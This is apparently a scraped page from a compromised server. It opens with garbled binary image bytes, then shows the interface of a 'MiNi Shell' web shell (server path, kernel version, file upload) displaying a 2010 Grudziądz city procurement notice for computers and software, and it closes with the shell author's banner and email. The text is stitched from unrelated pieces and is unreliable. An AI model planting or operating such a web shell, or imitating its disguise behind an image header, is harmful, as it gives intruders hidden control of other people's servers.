JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100510/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100510/114693-N-2010.html

<p class="kh_header"><b>Grudziądz: Dostawa sprzętu komputerowego i oprogramowania</b><br>
<b>Numer ogłoszenia: 114693 - 2010; data zamieszczenia: 10.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Grudziądz , ul. Ratuszowa 1, 86-300 Grudziądz, woj. kujawsko-pomorskie, tel. 056 4510233, faks (056) 4510233.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.grudziadz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu komputerowego i oprogramowania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa fabrycznie nowego sprzętu komputerowego:

                                                 CZĘŚĆ 1   
                                                                                    
 
1)	Zestaw komputerowy	31 szt
2)	Zestaw komputerowy	1 szt
3)	Zestaw komputerowy	7  szt.
4)	Notebook	 2 szt.
5)	Notebook	 1 szt.
6)	Notebook	  3 szt.
7)	Drukarka laserowa sieciowa A4	10 szt., Materiał eksploatacyjny:  100% nowy,  nie regenerowany , nie refabrykowany i nie napełniany toner. Toner o powiększonej wydajności jeżeli taki istnieje 20 szt.
8)	Drukarka laserowa sieciowa A4 1 szt., Materiał eksploatacyjny:  100% nowy,  nie regenerowany , nie refabrykowany i nie napełniany toner. Toner o powiększonej wydajności jeżeli taki istnieje. 2 szt.
9)	Ploter	1 szt., Materiał eksploatacyjny:  100% nowe,  nie regenerowane , nie refabrykowane i nie napełniane tusze i głowice. Tusze i głowice o powiększonej wydajności jeżeli takie istnieją. 2 kpl.
10)	Skaner		3 szt.
11)	Serwer		1 szt.
12)	UPS Rack 19		2 szt.
13)	Projektor		1 szt.
14)	Uchwyt podsufitowy do projektora	1 szt.
15)	Ekran projekcyjny	1 szt.
16)	Extender Video		1 kpl.
17)	Konsola KVM		2 szt.
18)	Czytnik kodów kreskowych	2 szt.
19)	Dysk twardy zewnętrzny	1 szt.
20)	Oprogramowanie	MS Office Standard 2007 MOLP PL GOV 43 Users 	1 szt.
21)	Oprogramowanie	Przedłużenie ważności licencji na 1 rok od 10.05.2010 r.  Antyvirus   F-secure Client Security PL na 90 stanowisk 1 szt.
22)	Oprogramowanie	Przedłużenie ważności licencji na 1 rok od  28.12.2010 r. Antyvirus    F-secure Client Security PL na 110 stanowisk	1 szt.
23)	Oprogramowanie	Anitivirus    F-secure Client Security PL na 50 stanowisk	1 szt.
24)	Oprogramowanie	MS Windows Server Standard 2008 R2  MOLP GOV PL         64 bit z 20 MS Windows Server CAL 2008 User MOLP GOV 	1 szt.
25)	Oprogramowanie	Program do podstawowych obliczeń geodezyjnych Winkalk wraz z modułami:  projektowanie tras, wyrównanie ścisłe, niwelacja + obliczanie mas ziemi, transformacja układów, współpraca z rejestratorami i totalstation	4 szt.
26)	Oprogramowanie	Program C-Geo V8 Professional dla Windows	4 szt.
27)	Oprogramowanie	Symantec Backup Exec 2010 Win Sercer z 12 miesięcznym podstawowym wsparciem i Symantec Backup Exec 2010 Agent Win Systems z 12 miesięcznym podstawowym wsparciem	1 szt.



                                           CZĘŚĆ 2
1)	Notebook		1 szt.
2)	Oprogramowanie	MS Office 2007 Professional  Academic Edition PL BOX	1 szt.
3)	Oprogramowanie	MS Project 2007 PL BOX	1  szt.
4)	Kserokopiarka	1 szt.
5)	Projektor		1 szt
6)	Ekran projekcyjny		1 szt
7)	Tablica interaktywna z projektorem i notebookiem:  6 szt
Dostawa sprzętu komputerowego i oprogramowania na potrzeby Urzędu Miejskiego w Grudziądzu na 2010 r. oraz realizacja projektu pn: Komunikacja kluczem do integracji wg zestawień stanowiących załącznik Nr 2-Część 1 i Nr 3 -Część 2. Wyszczególnione parametry sprzętu komputerowego w Formularzach cenowych Nr 2 i Nr 3 są parametrami minimalnymi. Wyżej wskazany sprzęt komputerowy  musi posiadać certyfikaty CE, które Wykonawca będzie zobowiązany dostarczyć  w formie papierowej wraz z dostawą sprzętu  komputerowego. 
Miejsce dostawy:
Część 1) Sprzęt i oprogramowanie opisane w załączniku nr 1 należy dostarczyć do Urzędu Miejskiego w Grudziądzu, ul. Ratuszowa 1, pokój 309. 
Część 2) Sprzęt i oprogramowanie opisane w załączniku nr 2 należy dostarczyć do Urzędu Miejskiego w Grudziądzu, ul. Wodna 1, Brama Wodna. 

Podwykonawcy:
Wykonawca, który zamierza powierzyć podwykonawcom wykonanie jakiejkolwiek części zamówienia, zobowiązany jest wskazać na druku oferty zakresy zamówienia powierzane podwykonawcom. Brak jakiejkolwiek wzmianki w tym zakresie na formularzu oferty, będzie uznawane za stwierdzenie samodzielnego wykonania zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.21.10.00-1, 30.21.30.00-5, 30.21.31.00-6, 30.23.72.70-2, 30.23.21.00-5, 30.23.21.10-8, 30.21.61.10-0, 32.42.00.00-3, 38.65.21.00-1, 38.65.34.00-1, 30.21.61.30-6, 30.23.13.10-3, 30.12.13.00-6, 30.23.00.00-0, 32.32.20.00-6, 48.00.00.00-0, 48.21.93.00-9, 48.31.00.00-4, 48.32.10.00-4, 48.31.80.00-0, 48.76.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.grudziadz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski, Biuro Zamówień Publicznych, ul. Ratuszowa 1, 86-300 Grudziądz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.05.2010 godzina 09:30, miejsce: Urząd Miejski, Biuro Zamówień Publicznych, ul. Ratuszowa 1, 86-300 Grudziądz, pok. 114.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Część 2 przewidziana do współfinansowania w ramach POKL współfinansowanego ze środków Europejskiego Funduszu Społecznego Priorytet IX Wysoka jakość systemu oświaty Działanie 3.3. Poprawa jakości kształcenia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa sprzętu komputerowego i oprogramowania dla Urzędu Miejskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Zestaw komputerowy	31 szt
2)	Zestaw komputerowy	1 szt
3)	Zestaw komputerowy	7  szt.
4)	Notebook	 2 szt.
5)	Notebook	 1 szt.
6)	Notebook	  3 szt.
7)	Drukarka laserowa sieciowa A4	10 szt., Materiał eksploatacyjny:  100% nowy,  nie regenerowany , nie refabrykowany i nie napełniany toner. Toner o powiększonej wydajności jeżeli taki istnieje 20 szt.
8)	Drukarka laserowa sieciowa A4 1 szt., Materiał eksploatacyjny:  100% nowy,  nie regenerowany , nie refabrykowany i nie napełniany toner. Toner o powiększonej wydajności jeżeli taki istnieje. 2 szt.
9)	Ploter	1 szt., Materiał eksploatacyjny:  100% nowe,  nie regenerowane , nie refabrykowane i nie napełniane tusze i głowice. Tusze i głowice o powiększonej wydajności jeżeli takie istnieją. 2 kpl.
10)	Skaner		3 szt.
11)	Serwer		1 szt.
12)	UPS Rack 19		2 szt.
13)	Projektor		1 szt.
14)	Uchwyt podsufitowy do projektora	1 szt.
15)	Ekran projekcyjny	1 szt.
16)	Extender Video		1 kpl.
17)	Konsola KVM		2 szt.
18)	Czytnik kodów kreskowych	2 szt.
19)	Dysk twardy zewnętrzny	1 szt.
20)	Oprogramowanie	MS Office Standard 2007 MOLP PL GOV 43 Users 	1 szt.
21)	Oprogramowanie	Przedłużenie ważności licencji na 1 rok od 10.05.2010 r.  Antyvirus   F-secure Client Security PL na 90 stanowisk 1 szt.
22)	Oprogramowanie	Przedłużenie ważności licencji na 1 rok od  28.12.2010 r. Antyvirus    F-secure Client Security PL na 110 stanowisk	1 szt.
23)	Oprogramowanie	Anitivirus    F-secure Client Security PL na 50 stanowisk	1 szt.
24)	Oprogramowanie	MS Windows Server Standard 2008 R2  MOLP GOV PL         64 bit z 20 MS Windows Server CAL 2008 User MOLP GOV 	1 szt.
25)	Oprogramowanie	Program do podstawowych obliczeń geodezyjnych Winkalk wraz z modułami:  projektowanie tras, wyrównanie ścisłe, niwelacja + obliczanie mas ziemi, transformacja układów, współpraca z rejestratorami i totalstation	4 szt.
26)	Oprogramowanie	Program C-Geo V8 Professional dla Windows	4 szt.
27)	Oprogramowanie	Symantec Backup Exec 2010 Win Sercer z 12 miesięcznym podstawowym wsparciem i Symantec Backup Exec 2010 Agent Win Systems z 12 miesięcznym podstawowym wsparciem	1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.10.00-1, 30.21.30.00-5, 30.21.31.00-6, 30.23.72.70-2, 30.23.21.10-8, 30.21.61.10-0, 32.42.00.00-3, 30.21.61.30-6, 30.23.13.10-3, 30.23.00.00-0, 37.45.33.00-1, 48.00.00.00-8, 48.21.93.00-9, 48.31.00.00-4, 48.32.10.00-4, 48.31.80.00-0, 48.76.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa urządzenia wielofunkcyjnego, projektora, ekranu      projekcyjnego i sprzętu komputerowego z oprogramowaniem celem realizacji projektu Komunikacja kluczem do integracji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Notebook		1 szt.
2)	Oprogramowanie	MS Office 2007 Professional  Academic Edition PL BOX	1 szt.
3)	Oprogramowanie	MS Project 2007 PL BOX	1  szt.
4)	Kserokopiarka	1 szt.
5)	Projektor		1 szt
6)	Ekran projekcyjny		1 szt
7)	Tablica interaktywna z projektorem i notebookiem:  6 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.30.00-5, 30.21.31.00-6, 30.23.72.70-2, 38.65.21.00-1, 38.65.34.00-1, 48.21.93.00-9, 32.32.20.00-6, 30.12.13.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com